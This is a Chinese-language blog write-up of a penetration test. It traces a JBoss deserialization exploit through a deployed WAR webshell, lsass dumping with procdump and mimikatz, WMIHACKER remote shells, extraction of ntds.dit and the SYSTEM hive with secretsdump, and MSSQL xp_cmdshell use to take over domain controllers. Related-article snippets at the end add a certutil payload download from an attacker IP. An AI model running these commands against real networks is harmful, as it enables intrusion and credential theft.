CVE到内网然后拿下4个域控

VSole2022-05-07 22:12:13

0x00 前言

这次渗透测试是从一个CVE开始的,从CVE到内网然后到域控!手法简单!还是要多学习哈哈哈哈!啊啊啊,我想开学了!为什么不开学

0x01 一切从CVE开始

这个渗透测试的是通过JBoss的CVE反序列化漏洞进去的,然后通过一步一步的横向渗透获取了两个域控!首先对发现了该站点有JBoss页面,经过测试发现具有JBoss反序列化漏洞。

使用网上提供的EXP和利用方法,在VPS上面获取了一个shell。这里看到对方是windows系统,当前用户权限是管理员权限。并且该机器具有四张网卡,通向了四个网段!

查看该机器的系统信息,发现是一台Windows 10 的服务器,并且该机器是在域环境里面的!

接着本来想直接上线CobaltStrike的,但是测试了很久都无发上线,这里应该是有杀软之类的拦截了!那么我当前的思路就是通过这个反弹回来的shell 找到JBoss的部署路径部署war包的木马了

../../../server/default/deploy 

jar -cvf shell.war shell.jsp

一切顺利,也成功在冰蝎上连接上了部署上去的木马。真的是nice啊![ 暴龙点赞 ]

接着我上传了一个对免杀效果还是挺OK的马儿上去!但是也被杀了!看了免杀不到位啊。这里使用只能通过当前管理员权限创建一个用户,代理进入内网通过3389进去到对方机器了!

然后再使用冰蝎上传代理工具上去,进行两端连接之后成功登陆进入到对方的机器上面

进去之后发现对方开启的杀软是微软自带的杀毒软件!好家伙这个东西也太强了了吧![暴龙晕了] 但是我当前创建的用户无法关闭这个微软自带的杀软!。由于是windows10的系统,我通过procdump获取lsass.exe里面的凭据下载下来,然后通过mimikatz获取里面的信息

procdump64.exe -accepteula -ma lsass.exe lsass.dmp

接着下载下来使用mimikatz进行获取数据,并且保存到log中

mimikatz.exe "log" "sekurlsa::minidump lsass.dmp" "sekurlsa::logonPasswords full" exit

并且再第二处也留下了用户名和密码!这里密码收集起来可以后期可以进行利用。

利用刚刚mimikatz获取出来的用户名和密码登陆进入这台具有四张网卡的JBoss主机上面!其实最强的免杀应该就是没有杀软吧哈哈哈哈哈![暴龙点赞] 利用该管理员用户权限直接关闭微软的自带杀软后上线CobaltStrike

进去之后枚举域,发现存在挺多域的。通过对内网445端口的扫描返回的信息发现内网中大多主机都是再域ANDXXXXX中

直接ping 一下域名发现域控可能部署再192.168.1.5中,但是使用其他工具并不能获取到准确的域控信息

接着对内网的主机进行信息探测,对四个网段进行了探测扫描,发现192.168.1.0/24网段的主机很多ms17-010。并且windows7的主机比较多,但是依次对其进行ms17-010攻击并不能获取到shell。这里推测是杀软或者防火墙的锅。但是在192.168.8.0/24网段中成功打中了一台windows 2008服务器。

接着load上去mimikatz直接获取里面的凭证信息,并且获取到了明文的凭证信息(原谅我这懒惰的打码)

对这台主机进行3389端口扫描发现器开启了3389端口,远程登陆进去发现其不能出网!

一开始在MSF里面执行一些操作也是不能执行,发现进去之后有一个杀软ESET,并且关闭杀软需要密码。(啊....这!)

首先我想了一个办法,通过WEB机器远程进去到这台机器上面,通过远程桌面自带的磁盘共享分享木马或者工具到这台window 2008的系统上面。我首先把中转木马上去,直接被杀了!搞了一个免杀的密码上去却提示不能执行(啊!.... 原来我太菜了!)

接着我直接上传procdump获取这台主机的密码。然后dump下来使用mimikatz获取里面的数据。并且对这些密码进行了整理!接着使用CobaltStrike的插件对内网主机进行暴力破解,破解192.168.1.0/24网段有挺多主机是相同密码的。

接着上线了这里面的两台主机分别是192.168.1.46和192.168.1.180。接下来可以对这两台主机进行信息搜集。

登陆192.168.1.96和192.168.1.120发现是一台VNC登陆的机器。里面是登陆一台Linux,而且好像是虚拟机

接着使用远程桌面也上线一台win7主机。IP地址为192.168.1.203。但是是工作组的机器,应该是机器了

接着对192.168.1.0/24网段进行ssh主机的弱口令扫描。发现如下可以连接

接着对192.168.5.0/24网段进行爆破。爆破出了一个我没有登陆过的主机192.168.1.193

登陆进去是一个Windows 2008的操作系统,并且这个主机有一张网卡是100.0.0.101的IP。这里又通向新的网段

并且可能这台机器还是一台管理的机器,可以监控这几个网段的机器!

接着对192.168.8.0/24进行暴力破解。发现也是可以登陆进去一个主机

进去之后发现它的IP地址是192.168.1.90。可以看到它这些网段大多数主机都是相同的。接着来可以对这台主机进行密码获取。然后再对密码进行收集整理。再进行爆破

在这台主机发现他这里有远程桌面到其他主机,对方是Linux主机,这台应该就是管理机器了吧

接着还可以对内网资产进行扫描,发现了现内网很多JBoss但是主机都已经获取权限下来了!并且192.168.1.0/24这个网段很多永恒之蓝,但是都打不通,我怀疑就是杀软的锅,把payload 拦截了!

接着远程连接到192.168.1.134主机上面,这台主机没有什么服务,管理员应该不怎么搭理。但是在192.168.1.134这台主机这里它有共享磁盘给192.168.1.122。之前对192.168.1.122爆破到了密码,但是通过445并不能连接进去,这里通过WMIHACKER的进行135端口连接居然成功了!

项目地址:https://github.com/360-Linton-Lab/WMIHACKER
cscript //nologo WMIHACKER_0.6.vbs /shell 192.168.1.26 administrator "password"

接着上传一个procdump到对方主机上面。命令如下

cscript //nologo WMIHACKER_0.6.vbs /upload 192.168.1.122 administrator "password" "C:\Windows\Temp\procdump64.exe" "C:\Windows\Temp\procdump64.exe"

我直接查看一些远程连接,发现由远程连接记录。然后打开远程桌面发现这里留有远程登陆192.168.1.122的记录

但是使用mimikatz获取RPD凭证无果!!

接着我使用登陆192.168.1.134的密码登陆进入了192.168.1.122。这也太巧了吧!

接着通过远程桌面登陆进去了192.168.1.122。这里推测管理员应该是做了策略只允许192.168.1.134登陆这台机器,在一开始远程RDP却登陆不了192.168.1.122。进去之后发现是一个子域。真的是太幸运了!但是对方主机不能上线,这个域控开启了eset和微软的杀软,这里我直接拖下它的dmp获取密码hash。最后发现其192.168.1.134一个存储服务器,192.168.1.122里面的数据都通向192.168.1.134。

接着可以通过导出这个域控的ntds.dit文件出来获取域控krbtgt的hash出来

#创建快照,该快照包含Windows中的所有文件,且在复制时不会受到Windows锁定机制的影响
ntdsutil snapshot "activate instance ntds" create quit quit
#加载刚刚创建的快照,GUID是上一步创建快照的GUID,会生成一个挂载目录
ntdsutil snapshot "mount  {c668674b-0a7d-4b97-bef1-4fb58f683e57} " quit quit
#使用copy命令将快照中的文件复制到 c:tds.dit
copy  C:\$SNAP_202008160748_VOLUMEC$\\windowstdstds.dit c:tds.dit
#将之前加载的快照卸载并删除
ntdsutil snapshot "mount {c668674b-0a7d-4b97-bef1-4fb58f683e57}" "delete 2beb2b98-2375-46b5-a618-d4193f9f9610}" quit quit
#再次查询当前系统中的所有快照,显示没有任何快照,表示快照删除成功
ntdsutil snapshot "List All" quit quit

接着在域控导出ntds.dit后,还需要导出system.hive。因为system.hive中存放着ntds.dit的密钥。

reg save hklm\system c:\system

使用 impacket 工具包中的 secretdump.py 也可以解析 ntds.dit 文件,导出散列值。

impacket-secretsdump -system system -ntds ntds.dit LOCAL

接着通过krbtgt的hash制作黄金票据。

但是使用CS的批量上线都上线不了,要不就是对445进行了端口过滤,要么就是有杀软之类的禁止了上线。然后对域中的SPN进行扫描,发现了192.168.1.5开启了MSSQL服务。然后想起来之前看到有机器的MSSQL的密码是和机器登陆的密码是一样的,管理员应对密码的复用率很高,接着我对密码再次进行整理,对这个机器进行MSSQL暴力破解。成功登陆域控的MSSQL数据库。

接着开启MSSQL的xp_cmdshell开提权进入到域控的机器里面

幸运的是这里域控开启的MSSQL服务是administrator权限的,免去了提权的操作。不然遇到ESET又要倒大霉了!

既然是高权限,并且是出网的,我通过下载procdump到目标的主机然后获取到lsass的文件下来,利用IPC$连接到192.168.1.134这台机器上面把dump下来的文件copy到192.168.1.134这台机器。使用mimikatz获取明文密码。然后使用密码登陆进入到这台域控中。之前使用MS14-068。没有利用成功,却通过MSSQL提权到了域控!![暴龙点赞]

然后导出域控krbtgt的hash出来。再次通过IPC$连接把文件复制到192.168.1.134。接着在CS中下载到本地破解到域控中所有用户的hash

最后对域控和之前横向获取的主机进行密码的整理,虽然不能通过445批量上线全部主机,但是对开启了3389的主机进行登陆都是可以成功的登陆的!在192.168.1.0/24这个网段的主机 windows 7 居多是办公网段!并且存在ms17-010,但是大多不能利用。

0x02 结尾

经过了这个漫长的寒暑假[是真的长!]终于可以回学校了!准备会很少写博客了!接下来我的学习计划就是想把Linux系统和Windows系统的知识在加强!希望能成为一个差不多的运维 ^_^ 接着就是11月份的网络工程师哈哈哈!成为一个合格的网络工程师 ^_^ ,接着在成为一个不合格的程序员哈哈哈哈!

网段mimikatz
本作品采用《CC 协议》,转载必须注明作者和本文链接
主要功能配合使用工具(如Mimikatz)扫描本地密码,并将密码写入source/pass_list.txt 以下工具(1)简称(1)(1)检测域。检测到域后,工具 (2)自动使用 “net user /domain”等语法检测判断域用户(3)探索其他存活域主机:自动将网段IP信息写入source/ip_list.txt)语法:for /L %I in (1,1,254) DO @ping -w
记一次常规的域渗透
2023-03-30 09:48:11
@#45""okkkkkkkkkk,尝试登录:发现卡巴斯基和edr,直接关闭:私密马赛,我没能关掉,尝试通过导出密码拿下高用户的权限:reg save hklm\sam sam.hivereg save hklm\system system.hive本地secertdump解密这里我是从远程桌面托文件下来所以很卡,只选择下载了两个文件,security可以选择不下载:python secretsdump.py -system system.hive?
主要记录拿到Shell后再反弹MSF Shell、Mimikatz抓取密码以及登录域控等内网部分。前面漏洞环境搭建及打点等不作记录,可查看参考文章。攻击机利用Python开启HTTP服务$ python -m SimpleHTTPServer 8080. 靶机CMD下载木马文件$ certutil.exe -urlcache -split -f http://<攻击者IP>:8080/win.exe. [*] Started reverse TCP handler on <攻击者IP>:<攻击机监听端口>. 并且需要迁移到权限为NT AUTHORITY\SYSTEM的进程,因为进程迁移后meterpreter的权限是迁移进程的权限。查看靶机位数&进程meterpreter > sysinfo # 查看位数。配置路由meterpreter > run autoroute -s 192.168.52.0/24. MS17-010扫一下MS17-010meterpreter > background # 后台挂起Session
0x01 起源某天比较无聊,听一个朋友推荐httpscan这款工具,于是就下载下来试试。首先对某学校网段开始进行测试,测试时发现有个比较特殊的标题,一般有这个,证明存在目录遍历。这个就又比较开心,看到了phpinfo,这个文件和目录遍历漏洞性质也差不多,说大也大,说小也小。phpinfo属于处在信息收集阶段的一个重头,当有了这些信息,可以看出服务器端调用了那些库,以及一些敏感路径,从而进行深入的漏洞挖掘,用途也是很广的。
0x01 前言本文没什么技术含量,纯粹是无聊找国外的站点来练手,但是中途还是踩了点小坑,希望能帮到遇到同样问题的师傅吧。先做个计划任务权限维持,然后上fscan开扫。看了一下1.3主机开放了3389,不过系统是2016,不符合HASH传递登陆RDP的版本。所以可以直接尝试HASH传递登陆RDP。其实理论上来说直接新建个用户进去RDP劫持也是可以的,不过因为懒就没试了
0x00 前言这次渗透测试是从一个CVE开始的,从CVE到内网然后到域控!首先对发现了该站点有JBoss页面,经过测试发现具有JBoss反序列化漏洞。使用网上提供的EXP和利用方法,在VPS上面获取了一个shell。
某集团后渗透实战
2022-01-12 15:24:31
一次利用域的新漏洞攻击排坑之旅
记一次内网靶场学习
2021-12-15 15:56:44
记一次内网靶场学习
一、环境配置靶机下载地址:http://vulnstack.qiyuanxuetang.net/vuln/detail/2攻击示意图:靶机统一使用虚拟机搭建web服务器:windows7 ip:192.168.52.143/192.168.154.152域成员:windows server 2003 ip:192.168.52.141域控:windows server 2008 ip:192.16
#默认情况下,payload_inject执行之后会在本地产生一个新的handler,由于已经有了一个不需要再产生一个,所以这里设置为true. #这里是当前获得的session的id. 可以看到 cs 成功接收到 shell右键 Interact 调出 beacon 界面,net view 查看当前域中计算机列表,然后执行 shell 命令前面加上 shell 就可以了,例如 shell ipconfig四、制作木马首先创建监听器用于木马回连,Host 为 cs 服务端的 ipAttacks->Packages->Windows Executable?需要派生的目标右击选择Spawn,然后创建一个?
VSole
网络安全专家